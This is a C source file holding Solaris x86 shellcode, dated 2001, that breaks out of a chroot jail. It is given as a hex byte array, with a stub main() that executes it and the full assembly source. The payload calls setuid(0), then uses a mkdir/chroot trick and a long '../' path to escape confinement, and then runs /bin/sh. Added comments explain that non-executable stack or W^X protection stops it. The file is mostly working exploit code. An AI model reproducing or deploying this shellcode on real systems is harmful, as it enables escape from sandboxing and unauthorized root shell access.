/* 
 * chroot-break shellcode (solaris x86)
 * truefinder, seo@igrus.inha.ac.kr 
 * (2001/7/13)
 */

/*
 * Machine code for the chroot-break routine; the GAS source it corresponds
 * to is in the comment block at the end of this file.  Sequence, per that
 * listing: setuid(0), mkdir("sh"), chroot("sh"), chroot("../../..."),
 * execve("/bin/sh").
 *
 * Memory requirements (relevant for containment): the bytes build a
 * Solaris syscall stub (lcall $7,$0 / ret) in the stack frame and reach it
 * with `call *%edi`, and they write NUL terminators into the "../.."
 * and "/bin/sh" strings that live inside this array.  The stack therefore
 * has to be executable and this array has to be both writable and
 * executable.  With a non-executable stack or W^X enforced, the process
 * faults before any syscall is issued.
 */
char code[] =
 "\x89\xe5\x81\xc4\x38\xff\xff\xff\xc7\x85\x38\xff\xff\xff\x73\x68"
 "\xff\xff\x31\xc0\x88\x85\x3a\xff\xff\xff\x31\xd2\xc6\x45\x8f\x9a"
 "\x89\x55\x90\x89\x55\x94\xc6\x45\x94\x07\xc6\x45\x96\xc3\x89\x55"
 "\x98\x89\xef\x83\xef\x71\x31\xd2\x52\x52\x52\x83\xc0\x17\xff\xd7"
 "\x8d\x9d\x38\xff\xff\xff\x83\xec\x10\xb8\xff\xf1\xff\xff\x50\x53"
 "\x31\xc0\x83\xc0\x50\xff\xd7\x53\x31\xc0\x83\xc0\x3d\xff\xd7\xeb"
 "\x28\x5e\x89\xf3\x53\x31\xc0\x88\x66\x1e\x83\xc0\x3d\xff\xd7\xeb"
 "\x3c\x5e\x31\xd2\x52\x88\x56\x07\x89\x76\x08\x89\x56\x0c\x8d\x46"
 "\x08\x50\x56\x31\xc0\xb0\x3b\xff\xd7\xe8\xd3\xff\xff\xff\x2e\x2e"
 "\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f"
 "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\xe8\xbf\xff"
 "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* Function pointer through which main() enters `code`.  Old-style
 * declaration with an unspecified parameter list; it is called with no
 * arguments and no return value is used. */
void (*f)();
/* Entry point (implicit-int, pre-C99 style): treats the `code` byte array
 * as a function and jumps into it.  This only works where the data
 * segment is mapped executable; a NX / W^X policy stops it at the first
 * instruction fetch, which is the expected containment point. */
main()
{
  f = code;   /* char[] -> function pointer: an ISO C constraint violation, most compilers only warn */
  f();        /* not expected to return: the routine ends in execve and has no ret of its own */
}

/* assembly source of the shellcode above (GAS, AT&T syntax, Solaris x86)
 *
# setuid(0);
# mkdir("sh",755);
# chroot("sh");
# chroot("../../../../../../../../../../../../../");
# execve("/bin/sh", ... );

.file   "chroot2.s"
.version        "1.1"
.ident  "lcall sys call from stack"

#.data
#sys_vec:
#       .long 0x0000009a        # lcall 
#       .long 0xc3000700        #
#       .long 0x5e10ebc3        # ret

.text
.globl main
main:

var_set: 
        movl %esp, %ebp
        add $-200, %esp
        movl $0xffff6873, -200(%ebp)
        xorl %eax,%eax
        movb %al, -198(%ebp)

call_set:
        xorl  %edx,%edx
        movb  $0x9a,-113(%ebp)
        movl  %edx,-112(%ebp)
        movl  %edx,-108(%ebp)
        movb  $0x07,-108(%ebp)
        movb  $0xc3,-106(%ebp)
        movl  %edx,-104(%ebp)
        movl %ebp, %edi
        sub $113, %edi


# setuid(0);
setuid_start:
        xorl %edx,%edx
        pushl %edx      # arg1
        pushl %edx      # (0)
        pushl %edx      # ret
        addl $0x17,%eax
#       lcall $0x7, $0x0
#call sys_vec
call *%edi

# mkdir("sh");
mkdir_start:
#       leal cdir , %ebx
        leal -200(%ebp), %ebx
#       pushl $0x7
#       pushl %ebx
#       pushl $0x0
#       pushl $0x0
sub $16, %esp

        movl $0xfffff1ff,%eax # 0x000001ff
        pushl %eax
        pushl %ebx
#       pushl $0xffff   # ret 
        
        xorl %eax,%eax
        addl $0x50, %eax
#       lcall $0x7,$0x0
#call sys_vec
call *%edi

# chroot("sh");
chroot_start_1:
#       leal  cdir, %ebx
        pushl %ebx
#       pushl $0xffff   # ret
        
        xorl %eax,%eax
        addl $0x3d, %eax
#       lcall $0x7, $0x0
#call sys_vec
call *%edi

# chroot("../../../../../../../../../../../");
chroot_start_2:
        jmp dot_string
var_set_2:
        popl %esi
        movl %esi, %ebx
#       leal droot, %ebx
        pushl %ebx
#       pushl $0xffff   # ret
        xorl %eax,%eax
        movb %ah, 30(%esi)
        addl $0x3d, %eax
#       lcall $0x7, $0x0
#call sys_vec
call *%edi


# execve( name[0], name, 0);
        jmp string_loc

shell_start:
        popl %esi

        xorl %edx,%edx
        pushl %edx       # dummy ret
                                # "/bin/sh"
        movb %dl, 0x7(%esi)    # \0
        movl %esi, 0x8(%esi)    # addr
        movl %edx, 0xc(%esi)    #

        leal 0x8(%esi),%eax
        pushl %eax
        pushl %esi

#       pushl %edx       # dummy ret
        xorl %eax,%eax
        movb $0x3b,%al
##      lcall $0x7,$0x0
call *%edi

# exit(0);  (left commented out)
#       movl $0x1,%eax
#       movl $0x0,%edx
#       lcall $0x7,$0x0
#call sys_vec
#call *%edi
        
dot_string:
        call var_set_2
        .byte '.','.','/','.','.','/','.','.','/','.','.','/','.','.','/'
        .byte '.','.','/','.','.','/','.','.','/','.','.','/','.','.','/','.'
string_loc:
        call shell_start
        .string "/bin/sh"
*/